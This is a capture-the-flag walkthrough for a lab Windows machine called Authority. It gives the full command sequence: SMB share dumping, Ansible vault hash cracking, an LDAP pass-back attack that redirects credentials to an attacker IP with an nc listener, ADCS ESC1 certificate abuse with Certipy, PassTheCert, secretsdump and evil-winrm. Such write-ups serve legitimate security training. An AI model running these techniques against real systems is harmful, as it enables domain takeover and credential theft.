Authority
(Medium, Windows)
OVERVIEW
So we are given an IP address let’s scan it using Nmap
ENUMERATION
So we got so many open ports Let’s check them and don’t forget to add the Domain name in /etc/hosts file
I checked Port 80 and it is an IIS Windows Server and doesn’t have any hidden directories So now let’s check SMB Ports for Guest Login
Yes we can guest login and can see SMB shares so now let’s dump Development share on our machine for a good enumeration with smbclient
smbclient //authority.htb/Development -U guest%'' -c "prompt OFF;recurse ON;mget *"
Now After getting all the files let’s check them
We see four directories inside Ansible directory so it seems Ansible is the thing which we have to work upon first but we also see four other directories which hints us that these services might be used in this machine so after checking each directory and its files I found some useful things:
# A passphrase for the CA key.
ca_passphrase: SuP3rS3creT
ca_common_name: authority.htb
# ansible.cfg and ansible_inventory
remote_user = svc_pwm
ansible_user: administrator
ansible_password: Welcome1
# tomcat-users.xml.j2
<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>
<user username="robot" password="T0mc@tR00t" roles="manager-script"/>
None of them worked anywhere to get us some lead but it strongly indicates towards PWM configuration and it also gave us Tomcat admin password so it means that there must be another web page rather then that IIS Web Server at PORT 80 so i looked at my NMAP scan once again and i saw this
So navigating to PORT 8443 with https I saw this
Here it is PWM configuration login Now We have to find its password to change its Configuration So I started searching PWM directory inside Ansible Directory so in PWM/default/main.yml i found ansible vault encrypted keys and after arranging them i got this output:
#PWM ADMIN LOGIN
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
#PWM ADMIN PASSWORD
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
#LDAP ADMIN PASSWORD
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764
Now I remembered that John The Ripper has a function (ansible2john) from which we can crack these keys password which will be needed to decrypt these keys into plaintext
EXPLOITATION
So i saved each hash into different txt files so i have three different files, Now one by one
ansible2john ansible_hash_file_name > new_file_name
john --wordlist=rockyou.txt new_file_name
And after some time you will get the password that is required to crack the above ansible vault encoded keys and the password is same for all three keys above
Now we will save this password in a file named as pwd.txt and use ansible-vault tool which you can download using pip3 if you don’t have
pip3 ansible-vault --break-system-packages
Now go to the directory where you have your ansible vault encoded keys stored earlier not converted one the original one then do this
ansible-vault decrypt -v your-ansible-file --vault-password-file=pwd.txt
After decryption you will get your PWM Admin Password on the same file in which your key was stored
Now Login to PWM configuration Editor inside the website and go to LDAP Profile Enabled Option through Search Bar
Now there is a vulnerability known as LDAP Pass-Back Attack which is used to change the LDAP URL to attacker IP and LDAP PORT and On listening on the same port LDAP Back Passes the User Password which in this case is svc_ldap as you can see above in LDAP Proxy User
To Know More About This Vulnerability Read this ….
So Let’s change the LDAP URL’s default URL to
#on website
ldap://YOUR-MACHINE-IP:636
#on your machine
nc -lvnp 636
Now Click On Test LDAP Profile and head to your listener and wait !!
And you will successfully get the password for svc_ldap user . Now Let’s check if it is valid or not for a shell
USER FLAG
So as you see it is valid and we got our user flag
PRIVELEGE ESCALATION
Now I remembered seeing ADCS directory inside Ansible directory so let’s quickly check for any ADCS vulnerability using Certipy (ensure you are using latest one)
certipy find -u svc_ldap@authority.htb -p 'REDACTED' -dc-ip 10.129.47.203 -vulnerable -stdout
And we found it there is ESC1 vulnerability
Understanding the vulnerability
But as you can see User Enrollable Principals : Domain Computers which means Any domain-joined computer account can request a certificate using this template.
Since we own User account not Computer account we can add computer account if we has the rights
So let’s check in our svc_ldap shell
([ADSI]"LDAP://DC=authority,DC=htb")."ms-DS-MachineAccountQuota"
Since it is greater then 0 then it means we have the rights to add computer account so let’s use impacket-addcomputer.py module
addcomputer.py -computer-name MEOWPC$ -computer-pass '0xme0w' authority.htb/svc_ldap:'REDACTED'
We successfully added the computer account now let’s try requesting administrator certificate using Certipy
certipy req -u 'MEOWPC$' -p '0xme0w' -dc-ip 10.129.47.203 -target 'authority.htb' -ca 'AUTHORITY-CA' -template 'CorpVPN' -upn 'administrator@authority.htb'
the ca and template name can be seen earlier when we find the vulnerability earlier
We successfully got the administrator.pfx now let’s try authenticating using the certificate
if you found clock skew error do sudo ntpdate IP
NOTE: Due to some issues I had to reset my machine so don’t worry on seeing New IP in images below
certipy auth -pfx administrator.pfx -dc-ip 10.129.47.203 -username administrator -domain authority.htb
We, however, get an error KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type) . Some searching points us to this blog post, which explains that this likely means that the target Domain Controller does not support PKINIT . We can, however, use the PassTheCert tool to authenticate against LDAP using Schannel (Secure Channel).
So To Use PassTheCert tool you need to have both crt and key of the administrator
To obtain it you can either use openssl pkcs12 or just directly use certipy to obtain it which i prefers
certipy cert -pfx administrator.pfx -nocert -out administrator.key
certipy cert -pfx administrator.pfx -nokey -out administrator.crt
Now transfer all three files .pfx, .crt, .key to the PassTheCert/Python directory and now
There are many ways to get system access and we will talk about the fastest one and rest of the methods figure out yourself :)
Enter into LDAP shell
python3 passthecert.py -action ldap-shell -crt administrator.crt -key administrator.key -domain authority.htb -dc-ip 10.129.47.203
So as you can see we entered in the LDAP shell as administrator and added svc_ldap to Domain Admins group
Now you can dump the Administrator hash using secretsdump.py of Impacket
secretsdump.py authority.htb/svc_ldap:'REDACTED'@10.129.47.203
Now grab the Administrator Hash and use it to login into Administrator winrm shell and get the root flag
ROOT FLAG
evil-winrm -i 10.129.47.203 -u Administrator -H HASH
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!
For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANKS FOR READING !!!
